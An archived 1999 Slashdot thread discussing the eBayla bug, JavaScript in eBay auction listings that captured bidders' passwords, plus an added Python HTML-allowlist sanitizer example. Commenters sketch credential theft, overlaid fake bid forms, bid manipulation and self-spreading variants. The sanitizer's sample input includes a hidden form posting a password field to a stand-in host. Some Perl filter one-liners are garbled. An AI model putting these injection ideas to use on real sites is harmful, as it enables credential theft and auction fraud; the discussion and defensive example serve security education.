The eBayla Virus 81

An anonymous reader linked us a Tasty Bit from Tasty Bits about the eBayla virus: an auction item that contains some JavaScript that will email your private eBay info to the creator of the auction. Eek.
  • by Anonymous Coward
    If it's a virus, shouldn't it copy itself to other auction items? Does this one do that? I understand that it's definitely possible to do what this guy did, but is it possible to make a real virus out of JS? Not that I'd want to, just curious ;-)
  • by Anonymous Coward
    The really bad thing is that this javascript is displayed on the same page that the user enters their bid amount. It really wouldn't be too hard for someone to write javascript that:

    1) increases the amount bid before the form is submitted.

    2) just tells someone else what the proxy limit is. (Imagine, you submit your bid, and cracker_foobar is right up there, bidding one dollar below your limit. Gee, someone seems to know a lot about what I'm willing to pay.) You could get away with this scam for ages. I wonder who is already doing this...

  • by Anonymous Coward
    > ...I wonder who is already doing this...

    It's not too hard to find out. Just do an eBay search of item descriptions for javascript and examine any item that doesn't seem to have anything to do with web design. I just tried this and of the 143 matches, several items were mysteriously cancelled by eBay, but there was one very recently added item that included the ebayla code.

    eBay is gonna have to fix this quick or get in the habit of manually checking all of their auctions for dodgy javascript, but for a web company worth billions they sure don't seem to invest much of it in web design expertise.
  • by Anonymous Coward

    eBay is being ridiculous (also pigheaded and stupid and arrogant and other such things), threatening the guy who found the hole for them. When that sort of thing happens you fall on your feet fixing it, and then you (discreetly) fall on your feet thanking who found it.

    If they were to take action against the finder (presumably to protect their own asses), they might find what it's like to get the derision of the broadly-variable security research field; that ranges from negative mention in papers few people read to script-kiddie holocaust.

    Annoying too that the media's calling this a "virus," which it isn't, not even close.


  • Well designed pages work quite well without the Javascript as well. Try accessing pages with and without Javascript and I think you'll find that the value they add isn't as great as it appears initially.

    Maybe you can point to a page that uses Javascript effectively to enhance the experience. I'd like to see what you consider "making the page better for you".
  • by jandrese ( 485 ) <kensama@vt.edu> on Thursday April 22, 1999 @02:30PM (#1920555) Homepage Journal
    >RANT< As a web user I find Javascript generally useless and slow.

    It seems to me that 50% of the Javascript on the web is used to hilite a link when you move your cursor over it, which I think is absolutely useless. My cursor already changes when I move it over a link, and loading a button twice just to have it reinforce the cursor change is not how I want to spend my time.

    Another 40% of the Javascript code out there opens annoying, useless "consoles" that take valuable screen space and rarely have any sort of meat to them.

    The last 10% is a mixed bag consisting of opening up a homepage to a site when you leave the site (Really really irritating ones force you to kill the browser to get off the site); making forms more "interactive", where the most frequent offender is the pulldown menu that automatically jumps to whatever you select, nevermind if you get it wrong or don't have Javascript. Frequently these pages omit the "submit" button as well, irritating Lynx users to no end.

    As if this isn't bad enough, Javascript is not exactly a solid standard, with Netscape and Microsoft implementing their own set of bugs and incompatibilities into each version of their browsers. "But this works on my machine at home and in the lab!".

    In conclusion: Javascript does not add enough value to my web surfing experience to counterbalance all of the negative issues associated with it. >/RANT<
  • Posted by labisso:

    It's always been my personal opinion that Ebay and windows are a lot alike-- hundreds of fun-filled security holes and error messages wrapped up in a nice GUI.

    But maybe that's just me.

    "He was dead when i got there, i swear!"
  • Posted by My_Favorite_Anonymous_Coward:

    I beg to differ...

    In my case, http://members.tripod.com/mystop

    I make 20-30 forms with javascript in less than 9k of code. If you do it with those tags you will probably triple the size. I know it's just 27k, but it DOES make the webpage a lot faster, especially with huge tables. (And yes, a huge table makes more sense and is faster than click click, when you want to check some company's inventory.)

    (Some of the forms don't work, I'm too lazy.)

    CY
  • Posted by My_Favorite_Anonymous_Coward:

    Hi,

    I haven't checked the original "trojan", but I kind of get the idea of it. However, I remember that I could use absolute positioning in ebay. (but I didn't use "top:0; left:0" So I'm not sure if you can cover the top!)

    Making a fake bidding form is quite easy, simply send the form to your server side and redirect the user back to the actual confirmation page. And then you use or at the end to dump the real submit form. (even if you can't dump the real submit form, some bidders will still be stupid enough to submit the upper form!!)


    CY
  • Posted by My_Favorite_Anonymous_Coward:

    Hi,

    I haven't checked the original "trojan", but I kind of get the idea of it. However, I remember that I could use absolute positioning in ebay. (but I didn't use "top:0; left:0" So I'm not sure if you can cover the top!)

    Making a fake bidding form is quite easy, simply send the form to your server side and redirect the user back to the actual confirmation page. And then you use "comment" or "table" tag at the end to dump the real submit form. (even if you can't dump the real submit form, some bidders will still be stupid enough to submit the upper form!!)


    CY
  • by gavinhall ( 33 )
    Posted by Condescending Unix User:

    What about the poor bastards using WebTV. Does the WebTV browser support javascript fully enough to be vulnerable to this? And if so, can they disable javascript in their WebTV units?
  • I only allow the banks I use online (i.e., they have my money) to use javascript or use cookies. I wish they didn't require javascript though so that I could use lynx which is preferred.

    Everyone else, you don't need javascript. (I'll allow java if I'm in netscape which I'm not, only because java is designed for security) I allow a few sites like /. a cookie, but unless you actually do something that needs a cookie you don't get one. (Yes I know cookies are relatively secure)

  • Post all info to a news group, so that you can't get fingered by "hmmmmm, all this information seems to be being sent to joe.stupid@unlucky.isp.com"

    Or just have it send to the address of someone you don't like, whose email account you have managed to break into.
  • The demo isn't properly a virus, but it is possible (but difficult) to make it one. It is not inconceivable to have a script look at any auctions the user may have, and change the description to include the virus code. To me, that would make it a true virus.

  • This goes back to making the web accessible. Javascript is not a guarantee by the end user (whether he has turned it off, or is using a browser without it).

    Mind you, JavaScript can be used nicely to enhance a page, but requiring people to use Javascript to navigate your pages is a *Bad* thing.

    Plus, with all the different implementations out there (notice that some browsers have to fake their identity to get JS to work right), and with the potential security loopholes out there, JavaScript is just not a good thing right now. It can be if the browser makers buckled down and secured it, but I don't see that happening for a while.

    Moral is to use JavaScript as additional flavor to a page, but not as a requirement to use it.
  • &lt; shows up as <. Similarly with &gt; (>). It's the browser that's ignoring the tags, not Slashdot's fault.
  • I'd class this as a trojan since it opens your data up to the outside.

    If you want to make it a virus, perhaps a two part virus, have it or the other part (back home) scan ebay for items for sale (modifiable pages) owned by the person whose ID you just stole. If they have any such pages, log in and modify them to include the viral code.

    Then try to log in to their isp, a few good guesses based on their personal data and I bet more than half have matching passwords. See if they have any home pages, edit them to include the viral code...
  • In its present form, you're right, it's just a trojan horse. However, if you actually read the page linked to above, you'd see that the possibility exists for this to be transformed into a virus.

    Say I run the trojan on my auction. It steals your password. I've programmed it to create more auctions, supposedly by you, that also steal your password and send it to me...It spreads for every person that bids. Wouldn't it be a virus then?

    My $.02
  • It's not just viewing an auction. This requires the user to place a bid on the auction (which requires entering the username & password), so it only affects a few people.


    -mike kania
  • eBayla looks a lot like eBay LA (or eBayLA), which is the name of eBay's upcoming Los Angeles-area listing directory. "eBayla virus" is a little too cute to be anything but a nickname.

    I always regard it as a goof-up when I find I've left my JavaScript turned on in Netscape for no particular reason...
  • JavaScript was originally called "liveScript". "liveConnect" is something else... I think it's the thing that lets Java and JavaScript (and possibly some other things) talk to each other. One use for it is so Java applets can access cookies. (JavaScript can access cookies, but Java applets cannot. But if a Java applet can communicate with JavaScript on a page...)
  • Well, I'd like to think that *my* site makes good use of Javascript. When you enter the site, you get a small popup window. The window lists all the other people also viewing the page. If you click on their names, you can instant message them. Is that useless? I don't think so.
  • I've got one that I've been meaning to find the time to try that relies not on Javascript, but on user stupidity... I'm sure there are plenty more.

    In any case, I rarely have Javascript enabled (I've yet to see any use for it that makes it worthwhile, and plenty that make it a nuisance) and can't possibly imagine why an auction item would require Javascript to describe it.

    The obvious solution to eBayla is to disallow Javascript in auction descriptions -- unfortunately I think the folks at eBay are too busy counting their money to actually do something to make the system better.

  • I think the name has little to do with what kind of code it is (virus vs. Trojan) and more with the soundbite-ness of it.

    Ebola virus = eBayla virus, etc.

    I know I'm being pedantic, but a lot of people are griping about the inaccuracy...

    Jay (=
  • This is a slightly better version that was mentioned on BUGTRAQ earlier today:

    http://www.news.com/News/Item/0,4,353 21,00.html [news.com]

    The summary about eBay's response:

    eBay acknowledged that the JavaScript exploit works, but minimized its importance.

    "We know it's there, but you have to put it all in perspective," said eBay spokesman Kevin Pursglove. "We have a very open environment that lets individuals describe what they're selling, and JavaScript is there so people can make the best of their abilities to describe an item."

    -- Bryan Feir

  • JavaScript is safe, except when idiots like eBay make it unsafe.

    Run that by me once again: If I connect to eBay they somehow replace my browser's "safe" Javascript engine with an "unsafe" one?

    If a technology can be (ab)used for "unsafe" purposes, it is by extension unsafe. Computer security at whatever level cannot be based on the assumption that everybody will use technology in a safe manner, and not try to do nasty things to you.

    (It's a bit like the CERT/CC stuff in the late 80s/early 90s: Largely only Sun actually admitted their holes and bugs to them. Did that mean other Unix vendors had bug- and hole-free implementations? No, they just didn't want the "exposure". This meant that hackers knew the holes (like Ultrix' "finger @@"), while administrators not necessarily learnt of it.)

    It's a good thing such things get out - what would eBay have said if the whole mess was discovered at a much later date, and a bunch of people sued them instead?

  • I've been setting up an auction website myself, and the easy way around this is simply limiting the allowed HTML, much the same way slashdot posts do :).... Letting them use , etc, is usually not a problem, but letting go by?

    Really f***ing ignorant, ebay :). What I can't understand is that eBay even strips the quotation marks. Ah, well....
    -Rahga
    yet another perl + CGI + html guy
  • $itemdescription =~ s/*script|/
    I said it was quick :)
  • $itemdescription =~ s/|//gi

    g for all occurrences
    i for ignore case, as in""
    on the first i forgot the "... the >'s is also necessary (think "I've got a script!!!
    ....")
  • $itemdescription =~ s/(less than)*script*(greater than)|(less than)\/*script*(greater than)//gi
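
Added example (not from any poster in this thread, and not eBay's or Slashdot's code): the "limit the allowed HTML" approach suggested above, set beside a tag-deleting blocklist of the kind the one-liners attempt. The tag allowlist, the `blocklist_strip` stand-in and the sample description are assumptions constructed for illustration.

```python
import re
from html import escape
from html.parser import HTMLParser

# Assumed allowlist for an auction description; everything else is dropped.
ALLOWED_TAGS = {"b", "i", "u", "em", "strong", "p", "br", "ul", "ol", "li", "a"}
VOID_TAGS = {"br"}                    # tags that never get a closing tag
DROP_CONTENT = {"script", "style"}    # drop the element AND the text inside it
SAFE_SCHEMES = ("http://", "https://")


class DescriptionSanitizer(HTMLParser):
    """Re-emit only allowlisted tags, with no attributes except a vetted href."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open_tags, self.skip_depth = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag (form, input, div, ...): drop tag, keep its text
        rendered = "<" + tag
        if tag == "a":
            href = (dict(attrs).get("href") or "").strip()
            if href.lower().startswith(SAFE_SCHEMES):
                rendered += ' href="%s" rel="nofollow"' % escape(href, quote=True)
        # Every other attribute (style, event handlers) is never copied.
        self.out.append(rendered + ">")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in self.open_tags:
            while self.open_tags:  # also closes anything left open inside it
                closed = self.open_tags.pop()
                self.out.append("</%s>" % closed)
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def finish(self):
        while self.open_tags:  # balance tags the seller left unclosed
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize(description):
    parser = DescriptionSanitizer()
    parser.feed(description)
    parser.close()
    return parser.finish()


def blocklist_strip(description):
    # Constructed stand-in for a "delete the script tags" regex; not a poster's exact code.
    return re.sub(r"</?script[^>]*>", "", description, flags=re.IGNORECASE)


# Constructed sample description: script block, positioned fake form, attribute handler.
SAMPLE = (
    '<b>Rare lamp</b> in <i>mint</i> condition.'
    '<script>document.forms[0].onsubmit = function () { /* constructed */ };</script>'
    '<div style="position:absolute; top:0; left:0">'
    '<form action="http://collector.example/bid"><input name="pass"></form></div>'
    '<a href="javascript:void(0)" onmouseover="x()">details</a> '
    '<a href="http://example.com/lamp.jpg">photo</a>'
)

if __name__ == "__main__":
    print("blocklist:", blocklist_strip(SAMPLE))
    print("allowlist:", sanitize(SAMPLE))
```

The blocklist output still contains the form, the positioning style and the attribute handler, while the allowlist output keeps only the formatting tags and the one http link.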

  • And is there any "slashdota virus"? No, I don't think so ;)
  • I think the problem is not going to be with eBay. The major problems will be with sites like ubid.com, and onsale.com. Both places require you to enter in actual credit card information before you can bid. If someone was to exploit that, they could mess things up a lot.
  • I followed the link(s) about this, and from what i can discern, this guy just wrote a Javascript that prompted people for their password info.
    The point is that the victim has to be STUPID enough to enter their password.
    This is a classic case of a "social" or "psychological" hack. It does not rely on the cunning or skill of the programmer, it relies on the gullibility of the victim.
  • It would appear that this can be a virus in that it can alter all of my auctions after I bid on an infected item, infecting them in turn. It can then propagate itself this way indefinitely (or until every single auction is infected :-)

    Jason Dufair
    "Those who know don't have the words to tell
  • I think this is a hoax. It would be unlikely that anyone could get your username and PW when you look at their auction, because that information is not stored on your hard drive. The cookie that eBay sends you when you sign in might be on your HD, but a cookie wouldn't contain that info, just a unique identifier (anyone want to check this?)

    What about people who are not members? You don't have to be an eBay member to view an auction, and even if you are a member, you don't have to sign in unless you are placing a bid.

    Am I missing something? This just doesn't add up. I think we've been the victims of another virus hoax.

    - CokeBear
    ------------------------------
    "It is wrong always, everywhere and for everyone to believe anything upon insufficient evidence."
    W. K. Clifford, "The Ethics of Belief" p. 282
  • I seem to remember a court rule recently that declared personal information has intrinsic value... If someone uses an "EBayla" script, would that person (or EBay) be sue-able?

    Ick.
  • This is a serious problem eBay has to deal with..

    But wouldn't it be funny if this guy logged on to eBay and offered this javascript for sale? Include a snippet of code, with the guarantee that the script isn't active, and sell to the highest bidder?

    eBay would really have to get their butts in gear quick!

    I hope he doesn't have to suffer for his service to humanity.

    AS
  • Am I missing something?

    The way it works is that when you type in your username/passwd in order to make the bid, the JScript sends that to the originator and passes the bid info on to eBay. So, it's more like a Trojan.

    To turn this into a real virus, take the username/passwd combos you have collected, use them to log in and modify that user's auction pages to include the JScript, and it starts to spread...Do it automatically, and there's a problem. How long before that?


    Mike
    --

  • I called this trojans.. They don't self replicate, just create back doors and can delete files, etc.

    Yes JScript could be used to make a virus, 'cept I think it would take a lot of work and a lot of code. It would be interesting to see if someone is developing one, the code would be outrageous.
    "The pen is mightier than the sword... But what if you can't write?"
  • But... What's important is what you don't see. Working on webpages, I view source. A lot. And most of the JavaScript I see, like most of the best software in any case, is transparent. It's doing stuff so pages look better for you. Just like any good piece of software. Go to Hotwired [wired.com] for another article about this Ebay thingy. One person comments that he can't believe Ebay allows Javascript in people's auction descriptions, which I have to say is a pretty salient point. I think Ebay should not only ban javascript, but all browser-specific HTML. Just think: Ebay could force all auctioneers to submit to HTML 4.0 standards, creating a new breed of technically good web authors. (I use the term technically because AFAIK, HTML 4 doesn't standardize taste, thereby preventing nausea-inducing color combinations.)

  • If you disable JavaScript, you are disabling a lot more than pop-up windows (we all know what sites use those the most).

    As a web developer, I like JavaScript because it makes my life a lot easier.

    People who somehow think cookies and JavaScript can get your credit card number and steal your girlfriend just don't get it. JavaScript is safe, except when idiots like eBay make it unsafe. Their press release just underlines that they don't get it either.
  • Well, at least till EBay fixes it, all people have to do is disable javascript. I know I've been doing that for awhile. So those... Informational pop-up windows won't open when I close a page. Yeah, informational. -j
  • but its got a really cool name!
  • As a web user I find Javascript generally useless and slow.

    Yes! I turned javascript off and noticed a minimum order of magnitude speed increase. Plus, I got a nice side benefit... geo* type sites are bearable again to view. I don't really miss it.

    Additionally, a good website will make allowances to those stuck with "less-capable" (older) browsers. If I'm stuck with a link that's a "click-through" or a "pick your site", it's all a nice View Source away.

    Only problems are that Netscape doesn't support Cascading Style Sheets with javascript off, oddly, and that the "Break out of these frames" link sometimes works (from people who can't seem to realize that off site links should break out of the frames itself).

  • "JavaScript, which is unrelated to Sun Microsystems' Java programming language...."

    Kudos to news.com for including that. I run into way too many people who confuse Javascript with Java.

    The name "Javascript" was coined as a marketing tool to allow a scripting language (originally "liveconnect"?) to ride on the coattails of the Java programming language. Unfortunately, IMHO, the association has harmed the Java programming language.
  • Well even the links state it's not a virus, but it is a good soundbite for the news.

    I'm not sure which link you followed, but the one I followed explained quite clearly that just the simple matter of placing a bid on an auction (which requires your Ebay user name and password) would e-mail that same information to the person who had placed the script in the auction - with no warning to you. No special screens you wouldn't normally see on Ebay, no social engineering work required and no extra time taken.

    Nothing to warn you that something other than an ordinary auction bid has just taken place.

    If you are familiar with the way Ebay works this is easy to follow.
  • If (as it appears) he simply exploited it before pointing it out and giving them a chance to fix it, he's cracker scum and deserves to lose

    It certainly doesn't appear that way to me... but then I read the article...

    Ever hear of the phrase "shoot the messenger" - this is exactly what ebay is doing...
  • I've had correspondence with eBay over the past few days about this. I've tried out blue_adept's code, and it does work. I even e-mailed a little chunk of perl to eBay support with a description of the problem and a solution that could be easily implemented.

    Initially I got back a very misinformed response recommending that I change my password. I finally (3 emails later) got them to understand what I was talking about, and they claim that they are working on a JS filter and will have the status posted to:

    http://www2.ebay.com/aw/announce.shtml [ebay.com]

    I also cautioned them against prosecuting blue_adept, since that wouldn't be very good for them in a PR sense...

    Hopefully they listen.

  • eBay says they won't hold people accountable for bids entered with a pilfered password.

    How do they intend to determine whether the bid was entered legitimately?

    Seems like a wide open excuse for someone who does want to back out "Wasn't me who entered that bid. Must be that eBayla 'virus.'"

    Dumb decision on eBay's part. If they decide not to allow JavaScript they won't PO that many customers, but the press over this virus sure will.
  • When people started to demand security back in the late 80s, early 90s, the main threat to your computer was destructive viruses. Today's hostile code focusses on being intrusive (however, ebayla's information can easily be used for destructive purposes).

    Bottom Line: This is just the beginning! I am sure we'll see much more code like this in the near future. No straightforward fix in sight! So better know the tools you are using!

  • eBay needs to be taken out and beaten severely for not taking this threat seriously. The potential for serious exploitation is huge, and I can't believe they're taking the stand that this is a minor challenge that won't affect most people.

    Amongst the "cute" ideas I've read about below (that all seem immediately technically and socially possible):

    - Virus idea. Take each login/pw pair and introduce new JavaScript bids that spread further.

    - Redirection. No reason you can't take someone away from eBay, put up a "duplicate" site that requests credit-card info. Very few users regularly check their current address or security information, especially with a "well-known" site like eBay.

    - Bid stealing. Immediately send information about bids to a third-party, which can be used to drive up the price to the maximum any user is willing to bid.

    - Bid modification. Change all bids and triple the submitted price. With eBay's anal standards about bid-retrieval, this could be a major hassle.

    Sheer stupidity. Whoever is in charge of their public relations/technical departments REALLY dropped the ball today (and whenever they decided that JavaScript was somehow necessary and acceptable in auction descriptions).
  • I'm not surprised by eBay's reaction. It seems to me that most major corporations are in denial when it comes to security holes in their products.

    I guess it just means they have to spend money to fix it that they could otherwise channel to their already swollen profits.
  • I'm surprised that they are allowed to use "Java" in the name of it. Wouldn't that be some kind of trademark infringement?
  • Hi, this is blue_adept, the creator of the ebayla bug. I noticed that the only link mentioned in the article is to http://tbtf.com. That site updates itself daily... a static source of information on the bug is http://www.because-we-can.com
  • Hey AC- you have what version Netscape? I'm running "Communicator 4.06" and I KNOW I can turn off Javascript- it's definitely OFF. There are a few sites that crash my Netscape (it just shuts down very abruptly) with Javascript on. It's a total waste of time anyway.


  • I totally agree with the above AC comments- JavaScript is crap. If you, as a web developer, can't figure out how to do a useful, efficient page without it, the McDonald's near me needs you.

    Forget all the arguing- the very existence of a JavaScript virus that can cause ANY kind of damage or problem, PROVES that JavaScript is NOT secure, and is useless crap anyway.

    I've NEVER seen a need or reason to use it.

    You probably love those infernal, stupid, waste of 'net bandwidth background images that just make reading a major eyesore. I hope people start suing web developers who use busy background images for carpal tunnel retina.

    I bet you also use lots of equally stupid moving gifs. Whoever invented them should be put in stocks until 2030.

    I keep images off, Java off, and JavaScript off, and I'm a much happier surfer. :)


  • by bobby ( 109046 )
    Are you suggesting their web staff might be technologically impaired? Like maybe morons or something? So far, in my experience, I see a 1:1 correspondence between a serious lack of technical brainpower and choosing NT.
